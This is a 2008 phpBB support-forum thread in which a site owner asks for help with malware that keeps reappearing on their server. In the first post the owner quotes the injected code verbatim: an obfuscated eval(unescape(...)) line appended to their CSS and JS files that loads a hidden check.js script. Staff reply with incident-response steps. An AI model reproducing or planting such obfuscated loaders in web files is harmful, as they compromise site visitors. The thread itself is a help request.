PHPBB Virus- can't delete

Get help with installation and running phpBB 3.0.x here. Please do not post bug reports, feature requests, or MOD-related questions here.
Suggested Hosts
Forum rules
END OF SUPPORT: 1 January 2017 (announcement)
Locked
ato
Registered User
Posts: 6
Joined: Tue Jan 29, 2008 10:04 pm

PHPBB Virus- can't delete

Post by ato »

There is apparently a virus on my website. I did a search and found others who seemed to have the same problem. It looked like they concluded it was just a "false positive" and only a problem with the Avast anti-virus software. But I think mine is more than that. Here's a picture of the warning an Avast user gets on his computer: http://img.photobucket.com/albums/v405/ ... 7/uhoh.jpg

Note the file: jforcegames.com/public_html/phpBB3/styles/subsilver2/epiw/check.js

Now here's the thing, I'm not even using phpbb anymore. I use punbb. I deleted everything that even mentioned phpbb, but every single day this phpbb3 folder pops up on my web files. I delete it every day, but it always comes back. And whenever it's there, the virus warning pops up for Avast users (and maybe other users too, I don't know). And even more frustrating, it adds this code way at the bottom of every single one of my .css and .js files:

Code: Select all

/* a0b4df006e02184c60dbf503e71c87ad */ ;eval(unescape('%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53%53%31%20%3D%20%35%39%3B%20%4A%53%53%32%20%3D%20%36%39%34%30%39%38%3B%20%4A%53%53%33%20%3D%20%27%2F%70%68%70%42%42%33%2F%73%74%79%6C%65%73%2F%73%75%62%73%69%6C%76%65%72%32%2F%65%70%69%77%2F%64%75%6D%6D%79%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%20%27%2F%70%68%70%42%42%33%2F%73%74%79%6C%65%73%2F%73%75%62%73%69%6C%76%65%72%32%2F%65%70%69%77%2F%63%68%65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%2E%69%74%65%6D%28%30%29%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%6A%73%29%20%7D%3B%20')); /* a995d2cc661fa72452472e9554b5520c */
If I delete this code from any of the files it's on, it will just come back the next day whenever the phpbb3 folder comes back. It would take quite a bit of time to delete that code from every one of those files, so I haven't tried that yet. But I was told that doing that might be a solution to this problem. Also, changing my password didn't have any effect.

Does anyone know for sure what to do here?
Last edited by ato on Thu Mar 20, 2008 10:46 pm, edited 1 time in total.
rippededge
Registered User
Posts: 209
Joined: Tue Dec 04, 2007 1:55 am

Re: PHPBB Virus- can't delete

Post by rippededge »

what are the permissions set to in that file?
chainprayer
Registered User
Posts: 162
Joined: Sat Sep 08, 2007 5:25 pm
Contact:

Re: PHPBB Virus- can't delete

Post by chainprayer »

How did you initially get phpBB? Download off the official site? Torrent? Limewire? Self-installer? If it wasn't official, maybe it got in that way.
User avatar
Noxwizard
Support Team Leader
Support Team Leader
Posts: 10551
Joined: Mon Jun 27, 2005 8:41 pm
Location: Texas, USA
Name: Patrick Webster
Contact:

Re: PHPBB Virus- can't delete

Post by Noxwizard »

That's not a standard folder (epiw), please do the following:
My board has been hacked, what do I do? wrote:Please do the following before making any modifications to your board (this includes changing passwords, editing files, running the admin toolkit, etc.):
1) Save a copy of the files (simply create a local copy of the files on the server).
2) Save a copy of the database.
3) Save the server access logs for the time of the hack (they may be available in the 'logs' directory on the server, in your host's control panel or only by request directly from your host).
4) File a report in the incident tracker. Attach the items from steps 1-3 when you file the report or upload them to a secure location for the incident investigation team to download. Please do not start a new topic on the board, the proper place for incidents reports is the tracker.
[Support Template] - [Read Before Posting] - [phpBB Knowledge Base]
Do not contact me for private support, please share the question in our forums.
ato
Registered User
Posts: 6
Joined: Tue Jan 29, 2008 10:04 pm

Re: PHPBB Virus- can't delete

Post by ato »

rippededge wrote:what are the permissions set to in that file?
Well it's deleted right now so I can't check (of course it will be back though). But I'm pretty sure it has the same permissions as everything else. I never got a "don't have permissions" notice when deleting it. Although, I should add that there is a file on our server that we don't have permission to delete. I'm not sure it it's related to this phpbb virus, but my brother said he didn't add it and thought that it might be what's enabling the phpbb3 folder to keep coming back. It's public_html/test1/Arcade2004Frame/.pureftpd-upload.47881ae4.15.1e6f.b32c0908
How did you initially get phpBB? Download off the official site? Torrent? Limewire? Self-installer? If it wasn't official, maybe it got in that way.
I downloaded it from the official site. But I think the virus got in when I downloaded that style, which I got from phpbb3styles.net.
That's not a standard folder (epiw), please do the following:

My board has been hacked, what do I do? wrote:Please do the following before making any modifications to your board (this includes changing passwords, editing files, running the admin toolkit, etc.):
1) Save a copy of the files (simply create a local copy of the files on the server).
2) Save a copy of the database.
3) Save the server access logs for the time of the hack (they may be available in the 'logs' directory on the server, in your host's control panel or only by request directly from your host).
4) File a report in the incident tracker. Attach the items from steps 1-3 when you file the report or upload them to a secure location for the incident investigation team to download. Please do not start a new topic on the board, the proper place for incidents reports is the tracker.
Oh, ok. Thanks. I will try this.
Crazy-S
Registered User
Posts: 138
Joined: Wed Feb 07, 2007 12:41 am
Contact:

Re: PHPBB Virus- can't delete

Post by Crazy-S »

ato wrote:
rippededge wrote: Well it's deleted right now so I can't check (of course it will be back though). But I'm pretty sure it has the same permissions as everything else. I never got a "don't have permissions" notice when deleting it. Although, I should add that there is a file on our server that we don't have permission to delete. I'm not sure it it's related to this phpbb virus, but my brother said he didn't add it and thought that it might be what's enabling the phpbb3 folder to keep coming back. It's public_html/test1/Arcade2004Frame/.pureftpd-upload.47881ae4.15.1e6f.b32c0908
Well that is most likely your problem file/folder.... contact your host and have them delete it, I have had to do that in the past and it is not phpBB causing the errors most likely your cpanle or another possibility....

If you put any folder into your hosting account via FTP or file upload you should have the ability to delete it without problems...
Visit Crazy-Software.com for some great personalized gift making software!

Like Personalized candy Wrappers? Then visit Our Community
ato
Registered User
Posts: 6
Joined: Tue Jan 29, 2008 10:04 pm

Re: PHPBB Virus- can't delete

Post by ato »

Crazy-S wrote:
ato wrote:
rippededge wrote: Well it's deleted right now so I can't check (of course it will be back though). But I'm pretty sure it has the same permissions as everything else. I never got a "don't have permissions" notice when deleting it. Although, I should add that there is a file on our server that we don't have permission to delete. I'm not sure it it's related to this phpbb virus, but my brother said he didn't add it and thought that it might be what's enabling the phpbb3 folder to keep coming back. It's public_html/test1/Arcade2004Frame/.pureftpd-upload.47881ae4.15.1e6f.b32c0908
Well that is most likely your problem file/folder.... contact your host and have them delete it, I have had to do that in the past and it is not phpBB causing the errors most likely your cpanle or another possibility....

If you put any folder into your hosting account via FTP or file upload you should have the ability to delete it without problems...
Yea actually I just figured out I could delete that pureftpd file through cpanel with the file manager. I couldn't delete it through ftp. We'll see if it changes anything.
User avatar
Noxwizard
Support Team Leader
Support Team Leader
Posts: 10551
Joined: Mon Jun 27, 2005 8:41 pm
Location: Texas, USA
Name: Patrick Webster
Contact:

Re: PHPBB Virus- can't delete

Post by Noxwizard »

The .pureftpd files usually show up when there's some kind of problem during an FTP transfer, ie. the connection dropped. The system will usually remove those files after a little while.
[Support Template] - [Read Before Posting] - [phpBB Knowledge Base]
Do not contact me for private support, please share the question in our forums.
Locked

Return to “[3.0.x] Support Forum”